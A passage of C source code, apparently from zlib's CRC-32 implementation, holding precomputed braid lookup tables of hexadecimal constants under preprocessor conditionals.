0xf35a1243, 0xea412302, 0xc16c70c1, 0xd8774180, 0x9736d747, 0x8e2de606, 0xa500b5c5, 0xbc1b8484, 0x71418a1a, 0x685abb5b, 0x4377e898, 0x5a6cd9d9, 0x152d4f1e, 0x0c367e5f, 0x271b2d9c, 0x3e001cdd, 0xb9980012, 0xa0833153, 0x8bae6290, 0x92b553d1, 0xddf4c516, 0xc4eff457, 0xefc2a794, 0xf6d996d5, 0xae07bce9, 0xb71c8da8, 0x9c31de6b, 0x852aef2a, 0xca6b79ed, 0xd37048ac, 0xf85d1b6f, 0xe1462a2e, 0x66de36e1, 0x7fc507a0, 0x54e85463, 0x4df36522, 0x02b2f3e5, 0x1ba9c2a4, 0x30849167, 0x299fa026, 0xe4c5aeb8, 0xfdde9ff9, 0xd6f3cc3a, 0xcfe8fd7b, 0x80a96bbc, 0x99b25afd, 0xb29f093e, 0xab84387f, 0x2c1c24b0, 0x350715f1, 0x1e2a4632, 0x07317773, 0x4870e1b4, 0x516bd0f5, 0x7a468336, 0x635db277, 0xcbfad74e, 0xd2e1e60f, 0xf9ccb5cc, 0xe0d7848d, 0xaf96124a, 0xb68d230b, 0x9da070c8, 0x84bb4189, 0x03235d46, 0x1a386c07, 0x31153fc4, 0x280e0e85, 0x674f9842, 0x7e54a903, 0x5579fac0, 0x4c62cb81, 0x8138c51f, 0x9823f45e, 0xb30ea79d, 0xaa1596dc, 0xe554001b, 0xfc4f315a, 0xd7626299, 0xce7953d8, 0x49e14f17, 0x50fa7e56, 0x7bd72d95, 0x62cc1cd4, 0x2d8d8a13, 0x3496bb52, 0x1fbbe891, 0x06a0d9d0, 0x5e7ef3ec, 0x4765c2ad, 0x6c48916e, 0x7553a02f, 0x3a1236e8, 0x230907a9, 0x0824546a, 0x113f652b, 0x96a779e4, 0x8fbc48a5, 0xa4911b66, 0xbd8a2a27, 0xf2cbbce0, 0xebd08da1, 0xc0fdde62, 0xd9e6ef23, 0x14bce1bd, 0x0da7d0fc, 0x268a833f, 0x3f91b27e, 0x70d024b9, 0x69cb15f8, 0x42e6463b, 0x5bfd777a, 0xdc656bb5, 0xc57e5af4, 0xee530937, 0xf7483876, 0xb809aeb1, 0xa1129ff0, 0x8a3fcc33, 0x9324fd72}, {0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x00000000, 0x96300777, 0x2c610eee, 0xba510999, 0x19c46d07, 0x8ff46a70, 0x35a563e9, 0xa395649e, 0x3288db0e, 0xa4b8dc79, 0x1ee9d5e0, 0x88d9d297, 0x2b4cb609, 0xbd7cb17e, 0x072db8e7, 0x911dbf90, 0x6410b71d, 0xf220b06a, 0x4871b9f3, 0xde41be84, 0x7dd4da1a, 0xebe4dd6d, 0x51b5d4f4, 0xc785d383, 0x56986c13, 0xc0a86b64, 0x7af962fd, 0xecc9658a, 0x4f5c0114, 0xd96c0663, 0x633d0ffa, 0xf50d088d, 0xc8206e3b, 0x5e10694c, 0xe44160d5, 0x727167a2, 0xd1e4033c, 0x47d4044b, 0xfd850dd2, 0x6bb50aa5, 0xfaa8b535, 0x6c98b242, 0xd6c9bbdb, 0x40f9bcac, 0xe36cd832, 0x755cdf45, 0xcf0dd6dc, 0x593dd1ab, 0xac30d926, 0x3a00de51, 0x8051d7c8, 0x1661d0bf, 0xb5f4b421, 0x23c4b356, 0x9995bacf, 0x0fa5bdb8, 0x9eb80228, 0x0888055f, 0xb2d90cc6, 0x24e90bb1, 0x877c6f2f, 0x114c6858, 0xab1d61c1, 0x3d2d66b6, 0x9041dc76, 0x0671db01, 0xbc20d298, 0x2a10d5ef, 0x8985b171, 0x1fb5b606, 0xa5e4bf9f, 0x33d4b8e8, 0xa2c90778, 0x34f9000f, 0x8ea80996, 0x18980ee1, 0xbb0d6a7f, 0x2d3d6d08, 0x976c6491, 0x015c63e6, 0xf4516b6b, 0x62616c1c, 0xd8306585, 0x4e0062f2, 0xed95066c, 0x7ba5011b, 0xc1f40882, 0x57c40ff5, 0xc6d9b065, 0x50e9b712, 0xeab8be8b, 0x7c88b9fc, 0xdf1ddd62, 0x492dda15, 0xf37cd38c, 0x654cd4fb, 0x5861b24d, 0xce51b53a, 0x7400bca3, 0xe230bbd4, 0x41a5df4a, 0xd795d83d, 0x6dc4d1a4, 0xfbf4d6d3, 0x6ae96943, 0xfcd96e34, 0x468867ad, 0xd0b860da, 0x732d0444, 0xe51d0333, 0x5f4c0aaa, 0xc97c0ddd, 0x3c710550, 0xaa410227, 0x10100bbe, 0x86200cc9, 0x25b56857, 0xb3856f20, 0x09d466b9, 0x9fe461ce, 0x0ef9de5e, 0x98c9d929, 0x2298d0b0, 0xb4a8d7c7, 0x173db359, 0x810db42e, 0x3b5cbdb7, 0xad6cbac0, 0x2083b8ed, 0xb6b3bf9a, 0x0ce2b603, 0x9ad2b174, 0x3947d5ea, 0xaf77d29d, 0x1526db04, 0x8316dc73, 0x120b63e3, 0x843b6494, 0x3e6a6d0d, 0xa85a6a7a, 0x0bcf0ee4, 0x9dff0993, 0x27ae000a, 0xb19e077d, 0x44930ff0, 0xd2a30887, 0x68f2011e, 0xfec20669, 0x5d5762f7, 0xcb676580, 0x71366c19, 0xe7066b6e, 0x761bd4fe, 0xe02bd389, 0x5a7ada10, 0xcc4add67, 0x6fdfb9f9, 0xf9efbe8e, 0x43beb717, 0xd58eb060, 0xe8a3d6d6, 0x7e93d1a1, 0xc4c2d838, 0x52f2df4f, 0xf167bbd1, 0x6757bca6, 0xdd06b53f, 0x4b36b248, 0xda2b0dd8, 0x4c1b0aaf, 0xf64a0336, 0x607a0441, 0xc3ef60df, 0x55df67a8, 0xef8e6e31, 0x79be6946, 0x8cb361cb, 0x1a8366bc, 0xa0d26f25, 0x36e26852, 0x95770ccc, 0x03470bbb, 0xb9160222, 0x2f260555, 0xbe3bbac5, 0x280bbdb2, 0x925ab42b, 0x046ab35c, 0xa7ffd7c2, 0x31cfd0b5, 0x8b9ed92c, 0x1daede5b, 0xb0c2649b, 0x26f263ec, 0x9ca36a75, 0x0a936d02, 0xa906099c, 0x3f360eeb, 0x85670772, 0x13570005, 0x824abf95, 0x147ab8e2, 0xae2bb17b, 0x381bb60c, 0x9b8ed292, 0x0dbed5e5, 0xb7efdc7c, 0x21dfdb0b, 0xd4d2d386, 0x42e2d4f1, 0xf8b3dd68, 0x6e83da1f, 0xcd16be81, 0x5b26b9f6, 0xe177b06f, 0x7747b718, 0xe65a0888, 0x706a0fff, 0xca3b0666, 0x5c0b0111, 0xff9e658f, 0x69ae62f8, 0xd3ff6b61, 0x45cf6c16, 0x78e20aa0, 0xeed20dd7, 0x5483044e, 0xc2b30339, 0x612667a7, 0xf71660d0, 0x4d476949, 0xdb776e3e, 0x4a6ad1ae, 0xdc5ad6d9, 0x660bdf40, 0xf03bd837, 0x53aebca9, 0xc59ebbde, 0x7fcfb247, 0xe9ffb530, 0x1cf2bdbd, 0x8ac2baca, 0x3093b353, 0xa6a3b424, 0x0536d0ba, 0x9306d7cd, 0x2957de54, 0xbf67d923, 0x2e7a66b3, 0xb84a61c4, 0x021b685d, 0x942b6f2a, 0x37be0bb4, 0xa18e0cc3, 0x1bdf055a, 0x8def022d}, {0x00000000, 0x41311b19, 0x82623632, 0xc3532d2b, 0x04c56c64, 0x45f4777d, 0x86a75a56, 0xc796414f, 0x088ad9c8, 0x49bbc2d1, 0x8ae8effa, 0xcbd9f4e3, 0x0c4fb5ac, 0x4d7eaeb5, 0x8e2d839e, 0xcf1c9887, 0x5112c24a, 0x1023d953, 0xd370f478, 0x9241ef61, 0x55d7ae2e, 0x14e6b537, 0xd7b5981c, 0x96848305, 0x59981b82, 0x18a9009b, 0xdbfa2db0, 0x9acb36a9, 0x5d5d77e6, 0x1c6c6cff, 0xdf3f41d4, 0x9e0e5acd, 0xa2248495, 0xe3159f8c, 0x2046b2a7, 0x6177a9be, 0xa6e1e8f1, 0xe7d0f3e8, 0x2483dec3, 0x65b2c5da, 0xaaae5d5d, 0xeb9f4644, 0x28cc6b6f, 0x69fd7076, 0xae6b3139, 0xef5a2a20, 0x2c09070b, 0x6d381c12, 0xf33646df, 0xb2075dc6, 0x715470ed, 0x30656bf4, 0xf7f32abb, 0xb6c231a2, 0x75911c89, 0x34a00790, 0xfbbc9f17, 0xba8d840e, 0x79dea925, 0x38efb23c, 0xff79f373, 0xbe48e86a, 0x7d1bc541, 0x3c2ade58, 0x054f79f0, 0x447e62e9, 0x872d4fc2, 0xc61c54db, 0x018a1594, 0x40bb0e8d, 0x83e823a6, 0xc2d938bf, 0x0dc5a038, 0x4cf4bb21, 0x8fa7960a, 0xce968d13, 0x0900cc5c, 0x4831d745, 0x8b62fa6e, 0xca53e177, 0x545dbbba, 0x156ca0a3, 0xd63f8d88, 0x970e9691, 0x5098d7de, 0x11a9ccc7, 0xd2fae1ec, 0x93cbfaf5, 0x5cd76272, 0x1de6796b, 0xdeb55440, 0x9f844f59, 0x58120e16, 0x1923150f, 0xda703824, 0x9b41233d, 0xa76bfd65, 0xe65ae67c, 0x2509cb57, 0x6438d04e, 0xa3ae9101, 0xe29f8a18, 0x21cca733, 0x60fdbc2a, 0xafe124ad, 0xeed03fb4, 0x2d83129f, 0x6cb20986, 0xab2448c9, 0xea1553d0, 0x29467efb, 0x687765e2, 0xf6793f2f, 0xb7482436, 0x741b091d, 0x352a1204, 0xf2bc534b, 0xb38d4852, 0x70de6579, 0x31ef7e60, 0xfef3e6e7, 0xbfc2fdfe, 0x7c91d0d5, 0x3da0cbcc, 0xfa368a83, 0xbb07919a, 0x7854bcb1, 0x3965a7a8, 0x4b98833b, 0x0aa99822, 0xc9fab509, 0x88cbae10, 0x4f5def5f, 0x0e6cf446, 0xcd3fd96d, 0x8c0ec274, 0x43125af3, 0x022341ea, 0xc1706cc1, 0x804177d8, 0x47d73697, 0x06e62d8e, 0xc5b500a5, 0x84841bbc, 0x1a8a4171, 0x5bbb5a68, 0x98e87743, 0xd9d96c5a, 0x1e4f2d15, 0x5f7e360c, 0x9c2d1b27, 0xdd1c003e, 0x120098b9, 0x533183a0, 0x9062ae8b, 0xd153b592, 0x16c5f4dd, 0x57f4efc4, 0x94a7c2ef, 0xd596d9f6, 0xe9bc07ae, 0xa88d1cb7, 0x6bde319c, 0x2aef2a85, 0xed796bca, 0xac4870d3, 0x6f1b5df8, 0x2e2a46e1, 0xe136de66, 0xa007c57f, 0x6354e854, 0x2265f34d, 0xe5f3b202, 0xa4c2a91b, 0x67918430, 0x26a09f29, 0xb8aec5e4, 0xf99fdefd, 0x3accf3d6, 0x7bfde8cf, 0xbc6ba980, 0xfd5ab299, 0x3e099fb2, 0x7f3884ab, 0xb0241c2c, 0xf1150735, 0x32462a1e, 0x73773107, 0xb4e17048, 0xf5d06b51, 0x3683467a, 0x77b25d63, 0x4ed7facb, 0x0fe6e1d2, 0xccb5ccf9, 0x8d84d7e0, 0x4a1296af, 0x0b238db6, 0xc870a09d, 0x8941bb84, 0x465d2303, 0x076c381a, 0xc43f1531, 0x850e0e28, 0x42984f67, 0x03a9547e, 0xc0fa7955, 0x81cb624c, 0x1fc53881, 0x5ef42398, 0x9da70eb3, 0xdc9615aa, 0x1b0054e5, 0x5a314ffc, 0x996262d7, 0xd85379ce, 0x174fe149, 0x567efa50, 0x952dd77b, 0xd41ccc62, 0x138a8d2d, 0x52bb9634, 0x91e8bb1f, 0xd0d9a006, 0xecf37e5e, 0xadc26547, 0x6e91486c, 0x2fa05375, 0xe836123a, 0xa9070923, 0x6a542408, 0x2b653f11, 0xe479a796, 0xa548bc8f, 0x661b91a4, 0x272a8abd, 0xe0bccbf2, 0xa18dd0eb, 0x62defdc0, 0x23efe6d9, 0xbde1bc14, 0xfcd0a70d, 0x3f838a26, 0x7eb2913f, 0xb924d070, 0xf815cb69, 0x3b46e642, 0x7a77fd5b, 0xb56b65dc, 0xf45a7ec5, 0x370953ee, 0x763848f7, 0xb1ae09b8, 0xf09f12a1, 0x33cc3f8a, 0x72fd2493}, {0x00000000, 0x376ac201, 0x6ed48403, 0x59be4602, 0xdca80907, 0xebc2cb06, 0xb27c8d04, 0x85164f05, 0xb851130e, 0x8f3bd10f, 0xd685970d, 0xe1ef550c, 0x64f91a09, 0x5393d808, 0x0a2d9e0a, 0x3d475c0b, 0x70a3261c, 0x47c9e41d, 0x1e77a21f, 0x291d601e, 0xac0b2f1b, 0x9b61ed1a, 0xc2dfab18, 0xf5b56919, 0xc8f23512, 0xff98f713, 0xa626b111, 0x914c7310, 0x145a3c15, 0x2330fe14, 0x7a8eb816, 0x4de47a17, 0xe0464d38, 0xd72c8f39, 0x8e92c93b, 0xb9f80b3a, 0x3cee443f, 0x0b84863e, 0x523ac03c, 0x6550023d, 0x58175e36, 0x6f7d9c37, 0x36c3da35, 0x01a91834, 0x84bf5731, 0xb3d59530, 0xea6bd332, 0xdd011133, 0x90e56b24, 0xa78fa925, 0xfe31ef27, 0xc95b2d26, 0x4c4d6223, 0x7b27a022, 0x2299e620, 0x15f32421, 0x28b4782a, 0x1fdeba2b, 0x4660fc29, 0x710a3e28, 0xf41c712d, 0xc376b32c, 0x9ac8f52e, 0xada2372f, 0xc08d9a70, 0xf7e75871, 0xae591e73, 0x9933dc72, 0x1c259377, 0x2b4f5176, 0x72f11774, 0x459bd575, 0x78dc897e, 0x4fb64b7f, 0x16080d7d, 0x2162cf7c, 0xa4748079, 0x931e4278, 0xcaa0047a, 0xfdcac67b, 0xb02ebc6c, 0x87447e6d, 0xdefa386f, 0xe990fa6e, 0x6c86b56b, 0x5bec776a, 0x02523168, 0x3538f369, 0x087faf62, 0x3f156d63, 0x66ab2b61, 0x51c1e960, 0xd4d7a665, 0xe3bd6464, 0xba032266, 0x8d69e067, 0x20cbd748, 0x17a11549, 0x4e1f534b, 0x7975914a, 0xfc63de4f, 0xcb091c4e, 0x92b75a4c, 0xa5dd984d, 0x989ac446, 0xaff00647, 0xf64e4045, 0xc1248244, 0x4432cd41, 0x73580f40, 0x2ae64942, 0x1d8c8b43, 0x5068f154, 0x67023355, 0x3ebc7557, 0x09d6b756, 0x8cc0f853, 0xbbaa3a52, 0xe2147c50, 0xd57ebe51, 0xe839e25a, 0xdf53205b, 0x86ed6659, 0xb187a458, 0x3491eb5d, 0x03fb295c, 0x5a456f5e, 0x6d2fad5f, 0x801b35e1, 0xb771f7e0, 0xeecfb1e2, 0xd9a573e3, 0x5cb33ce6, 0x6bd9fee7, 0x3267b8e5, 0x050d7ae4, 0x384a26ef, 0x0f20e4ee, 0x569ea2ec, 0x61f460ed, 0xe4e22fe8, 0xd388ede9, 0x8a36abeb, 0xbd5c69ea, 0xf0b813fd, 0xc7d2d1fc, 0x9e6c97fe, 0xa90655ff, 0x2c101afa, 0x1b7ad8fb, 0x42c49ef9, 0x75ae5cf8, 0x48e900f3, 0x7f83c2f2, 0x263d84f0, 0x115746f1, 0x944109f4, 0xa32bcbf5, 0xfa958df7, 0xcdff4ff6, 0x605d78d9, 0x5737bad8, 0x0e89fcda, 0x39e33edb, 0xbcf571de, 0x8b9fb3df, 0xd221f5dd, 0xe54b37dc, 0xd80c6bd7, 0xef66a9d6, 0xb6d8efd4, 0x81b22dd5, 0x04a462d0, 0x33cea0d1, 0x6a70e6d3, 0x5d1a24d2, 0x10fe5ec5, 0x27949cc4, 0x7e2adac6, 0x494018c7, 0xcc5657c2, 0xfb3c95c3, 0xa282d3c1, 0x95e811c0, 0xa8af4dcb, 0x9fc58fca, 0xc67bc9c8, 0xf1110bc9, 0x740744cc, 0x436d86cd, 0x1ad3c0cf, 0x2db902ce, 0x4096af91, 0x77fc6d90, 0x2e422b92, 0x1928e993, 0x9c3ea696, 0xab546497, 0xf2ea2295, 0xc580e094, 0xf8c7bc9f, 0xcfad7e9e, 0x9613389c, 0xa179fa9d, 0x246fb598, 0x13057799, 0x4abb319b, 0x7dd1f39a, 0x3035898d, 0x075f4b8c, 0x5ee10d8e, 0x698bcf8f, 0xec9d808a, 0xdbf7428b, 0x82490489, 0xb523c688, 0x88649a83, 0xbf0e5882, 0xe6b01e80, 0xd1dadc81, 0x54cc9384, 0x63a65185, 0x3a181787, 0x0d72d586, 0xa0d0e2a9, 0x97ba20a8, 0xce0466aa, 0xf96ea4ab, 0x7c78ebae, 0x4b1229af, 0x12ac6fad, 0x25c6adac, 0x1881f1a7, 0x2feb33a6, 0x765575a4, 0x413fb7a5, 0xc429f8a0, 0xf3433aa1, 0xaafd7ca3, 0x9d97bea2, 0xd073c4b5, 0xe71906b4, 0xbea740b6, 0x89cd82b7, 0x0cdbcdb2, 0x3bb10fb3, 0x620f49b1, 0x55658bb0, 0x6822d7bb, 0x5f4815ba, 0x06f653b8, 0x319c91b9, 0xb48adebc, 0x83e01cbd, 0xda5e5abf, 0xed3498be}, {0x00000000, 0x6567bcb8, 0x8bc809aa, 0xeeafb512, 0x5797628f, 0x32f0de37, 0xdc5f6b25, 0xb938d79d, 0xef28b4c5, 0x8a4f087d, 0x64e0bd6f, 0x018701d7, 0xb8bfd64a, 0xddd86af2, 0x3377dfe0, 0x56106358, 0x9f571950, 0xfa30a5e8, 0x149f10fa, 0x71f8ac42, 0xc8c07bdf, 0xada7c767, 0x43087275, 0x266fcecd, 0x707fad95, 0x1518112d, 0xfbb7a43f, 0x9ed01887, 0x27e8cf1a, 0x428f73a2, 0xac20c6b0, 0xc9477a08, 0x3eaf32a0, 0x5bc88e18, 0xb5673b0a, 0xd00087b2, 0x6938502f, 0x0c5fec97, 0xe2f05985, 0x8797e53d, 0xd1878665, 0xb4e03add, 0x5a4f8fcf, 0x3f283377, 0x8610e4ea, 0xe3775852, 0x0dd8ed40, 0x68bf51f8, 0xa1f82bf0, 0xc49f9748, 0x2a30225a, 0x4f579ee2, 0xf66f497f, 0x9308f5c7, 0x7da740d5, 0x18c0fc6d, 0x4ed09f35, 0x2bb7238d, 0xc518969f, 0xa07f2a27, 0x1947fdba, 0x7c204102, 0x928ff410, 0xf7e848a8, 0x3d58149b, 0x583fa823, 0xb6901d31, 0xd3f7a189, 0x6acf7614, 0x0fa8caac, 0xe1077fbe, 0x8460c306, 0xd270a05e, 0xb7171ce6, 0x59b8a9f4, 0x3cdf154c, 0x85e7c2d1, 0xe0807e69, 0x0e2fcb7b, 0x6b4877c3, 0xa20f0dcb, 0xc768b173, 0x29c70461, 0x4ca0b8d9, 0xf5986f44, 0x90ffd3fc, 0x7e5066ee, 0x1b37da56, 0x4d27b90e, 0x284005b6, 0xc6efb0a4, 0xa3880c1c, 0x1ab0db81, 0x7fd76739, 0x9178d22b, 0xf41f6e93, 0x03f7263b, 0x66909a83, 0x883f2f91, 0xed589329, 0x546044b4, 0x3107f80c, 0xdfa84d1e, 0xbacff1a6, 0xecdf92fe, 0x89b82e46, 0x67179b54, 0x027027ec, 0xbb48f071, 0xde2f4cc9, 0x3080f9db, 0x55e74563, 0x9ca03f6b, 0xf9c783d3, 0x176836c1, 0x720f8a79, 0xcb375de4, 0xae50e15c, 0x40ff544e, 0x2598e8f6, 0x73888bae, 0x16ef3716, 0xf8408204, 0x9d273ebc, 0x241fe921, 0x41785599, 0xafd7e08b, 0xcab05c33, 0x3bb659ed, 0x5ed1e555, 0xb07e5047, 0xd519ecff, 0x6c213b62, 0x094687da, 0xe7e932c8, 0x828e8e70, 0xd49eed28, 0xb1f95190, 0x5f56e482, 0x3a31583a, 0x83098fa7, 0xe66e331f, 0x08c1860d, 0x6da63ab5, 0xa4e140bd, 0xc186fc05, 0x2f294917, 0x4a4ef5af, 0xf3762232, 0x96119e8a, 0x78be2b98, 0x1dd99720, 0x4bc9f478, 0x2eae48c0, 0xc001fdd2, 0xa566416a, 0x1c5e96f7, 0x79392a4f, 0x97969f5d, 0xf2f123e5, 0x05196b4d, 0x607ed7f5, 0x8ed162e7, 0xebb6de5f, 0x528e09c2, 0x37e9b57a, 0xd9460068, 0xbc21bcd0, 0xea31df88, 0x8f566330, 0x61f9d622, 0x049e6a9a, 0xbda6bd07, 0xd8c101bf, 0x366eb4ad, 0x53090815, 0x9a4e721d, 0xff29cea5, 0x11867bb7, 0x74e1c70f, 0xcdd91092, 0xa8beac2a, 0x46111938, 0x2376a580, 0x7566c6d8, 0x10017a60, 0xfeaecf72, 0x9bc973ca, 0x22f1a457, 0x479618ef, 0xa939adfd, 0xcc5e1145, 0x06ee4d76, 0x6389f1ce, 0x8d2644dc, 0xe841f864, 0x51792ff9, 0x341e9341, 0xdab12653, 0xbfd69aeb, 0xe9c6f9b3, 0x8ca1450b, 0x620ef019, 0x07694ca1, 0xbe519b3c, 0xdb362784, 0x35999296, 0x50fe2e2e, 0x99b95426, 0xfcdee89e, 0x12715d8c, 0x7716e134, 0xce2e36a9, 0xab498a11, 0x45e63f03, 0x208183bb, 0x7691e0e3, 0x13f65c5b, 0xfd59e949, 0x983e55f1, 0x2106826c, 0x44613ed4, 0xaace8bc6, 0xcfa9377e, 0x38417fd6, 0x5d26c36e, 0xb389767c, 0xd6eecac4, 0x6fd61d59, 0x0ab1a1e1, 0xe41e14f3, 0x8179a84b, 0xd769cb13, 0xb20e77ab, 0x5ca1c2b9, 0x39c67e01, 0x80fea99c, 0xe5991524, 0x0b36a036, 0x6e511c8e, 0xa7166686, 0xc271da3e, 0x2cde6f2c, 0x49b9d394, 0xf0810409, 0x95e6b8b1, 0x7b490da3, 0x1e2eb11b, 0x483ed243, 0x2d596efb, 0xc3f6dbe9, 0xa6916751, 0x1fa9b0cc, 0x7ace0c74, 0x9461b966, 0xf10605de}}; #endif #endif #if N == 2 #if W == 8 local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xae689191, 0x87a02563, 0x29c8b4f2, 0xd4314c87, 0x7a59dd16, 0x539169e4, 0xfdf9f875, 0x73139f4f, 0xdd7b0ede, 0xf4b3ba2c, 0x5adb2bbd, 0xa722d3c8, 0x094a4259, 0x2082f6ab, 0x8eea673a, 0xe6273e9e, 0x484faf0f, 0x61871bfd, 0xcfef8a6c, 0x32167219, 0x9c7ee388, 0xb5b6577a, 0x1bdec6eb, 0x9534a1d1, 0x3b5c3040, 0x129484b2, 0xbcfc1523, 0x4105ed56, 0xef6d7cc7, 0xc6a5c835, 0x68cd59a4, 0x173f7b7d, 0xb957eaec, 0x909f5e1e, 0x3ef7cf8f, 0xc30e37fa, 0x6d66a66b, 0x44ae1299, 0xeac68308, 0x642ce432, 0xca4475a3, 0xe38cc151, 0x4de450c0, 0xb01da8b5, 0x1e753924, 0x37bd8dd6, 0x99d51c47, 0xf11845e3, 0x5f70d472, 0x76b86080, 0xd8d0f111, 0x25290964, 0x8b4198f5, 0xa2892c07, 0x0ce1bd96, 0x820bdaac, 0x2c634b3d, 0x05abffcf, 0xabc36e5e, 0x563a962b, 0xf85207ba, 0xd19ab348, 0x7ff222d9, 0x2e7ef6fa, 0x8016676b, 0xa9ded399, 0x07b64208, 0xfa4fba7d, 0x54272bec, 0x7def9f1e, 0xd3870e8f, 0x5d6d69b5, 0xf305f824, 0xdacd4cd6, 0x74a5dd47, 0x895c2532, 0x2734b4a3, 0x0efc0051, 0xa09491c0, 0xc859c864, 0x663159f5, 0x4ff9ed07, 0xe1917c96, 0x1c6884e3, 0xb2001572, 0x9bc8a180, 0x35a03011, 0xbb4a572b, 0x1522c6ba, 0x3cea7248, 0x9282e3d9, 0x6f7b1bac, 0xc1138a3d, 0xe8db3ecf, 0x46b3af5e, 0x39418d87, 0x97291c16, 0xbee1a8e4, 0x10893975, 0xed70c100, 0x43185091, 0x6ad0e463, 0xc4b875f2, 0x4a5212c8, 0xe43a8359, 0xcdf237ab, 0x639aa63a, 0x9e635e4f, 0x300bcfde, 0x19c37b2c, 0xb7abeabd, 0xdf66b319, 0x710e2288, 0x58c6967a, 0xf6ae07eb, 0x0b57ff9e, 0xa53f6e0f, 0x8cf7dafd, 0x229f4b6c, 0xac752c56, 0x021dbdc7, 0x2bd50935, 0x85bd98a4, 0x784460d1, 0xd62cf140, 0xffe445b2, 0x518cd423, 0x5cfdedf4, 0xf2957c65, 0xdb5dc897, 0x75355906, 0x88cca173, 0x26a430e2, 0x0f6c8410, 0xa1041581, 0x2fee72bb, 0x8186e32a, 0xa84e57d8, 0x0626c649, 0xfbdf3e3c, 0x55b7afad, 0x7c7f1b5f, 0xd2178ace, 0xbadad36a, 0x14b242fb, 0x3d7af609, 0x93126798, 0x6eeb9fed, 0xc0830e7c, 0xe94bba8e, 0x47232b1f, 0xc9c94c25, 0x67a1ddb4, 0x4e696946, 0xe001f8d7, 0x1df800a2, 0xb3909133, 0x9a5825c1, 0x3430b450, 0x4bc29689, 0xe5aa0718, 0xcc62b3ea, 0x620a227b, 0x9ff3da0e, 0x319b4b9f, 0x1853ff6d, 0xb63b6efc, 0x38d109c6, 0x96b99857, 0xbf712ca5, 0x1119bd34, 0xece04541, 0x4288d4d0, 0x6b406022, 0xc528f1b3, 